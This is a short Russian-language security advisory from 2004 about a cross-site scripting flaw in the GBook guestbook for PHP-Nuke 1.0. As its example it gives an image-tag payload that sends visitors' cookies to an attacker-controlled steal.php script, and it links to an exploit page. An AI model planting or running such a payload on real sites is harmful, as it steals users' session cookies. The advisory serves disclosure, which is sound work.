Межсайтовый скриптинг в GBook для PHP-Nuke

Дата публикации:
09.02.2004
Всего просмотров:
1637
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: GBook 1.0

Описание: Уязвимость обнаружена в гостевой книге GBook для PHP-Nuke. Удаленный пользователь может выполнить XSS нападение.

Пример:

 
<img src="images/pix.gif" width="1" height="1" onload="waraxe.src='http://attacker.com/steal.php?stuff='+esca pe(document.cookie);">

Пример/Эксплоит: http://www.zone.ee/waraxe/sa001/steal.php

URL производителя: http://www.php-mania.com.ar

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Script injection in GBook for Php-Nuke

или введите имя

CAPTCHA